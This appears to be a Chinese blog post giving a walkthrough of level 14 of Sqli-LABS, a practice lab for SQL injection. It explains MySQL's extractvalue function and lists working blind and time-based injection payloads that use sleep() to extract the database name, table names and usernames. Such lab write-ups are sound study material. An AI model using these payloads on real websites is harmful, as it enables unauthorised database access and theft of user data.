Sqli-LABS通关笔录-14 - 走看看

zoukankan html css js c++ java

Sqli-LABS通关笔录-14

这一节让我学习到了

1.extractvalue函数（该函数用于对xml文件进行查询和修改，于此相关的还有一个叫“updatexml”函数）

语法：extractvalue(XML_document, XPath_string);
　　　　第一个参数：XML_document是String格式，为XML文档对象的名称，文中为Doc
　　　　第二个参数：XPath_string (Xpath格式的字符串) ，如果不了解Xpath语法，可以在网上查找教程。

　　　　作用：从目标XML中返回包含所查询值的字符串

关于该函数的介绍使用：http://www.blogjava.net/chenpengyi/archive/2006/07/11/57578.html

2.

Payload:

admin" and 1=1#

这题方法也是要用盲注。

------------------------------------------------------------------------------------------------

延时Payload:

猜数据库：admin" and if(ascii(substring(database(),1,1))=115,sleep(10),1)--+

猜表：admin" AND if(ascii(substring((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1))>1,sleep(20),1)#

猜列明：admin" AND if(ascii(substr((select username from security.users order by id limit 0,1),2,1))=117,sleep(10),1)#

------------------------------------------------------------------------------------------------

THE END

查看全文

相关阅读:
JQuery图片预览
 1.数组
 1.什么是C++
安装PHPCMS 遇到的问题（fsockpen）
解决采集时提示”没有找到网址列表，请先进行网址采集“的问题
 JAVA 常用的网站
 页面静态化
 我的C笔记系列一
 PHP缓存技术
 PHPCMS 采集规则

原文地址：https://www.cnblogs.com/xishaonian/p/6133467.html

Copyright © 2011-2022 走看看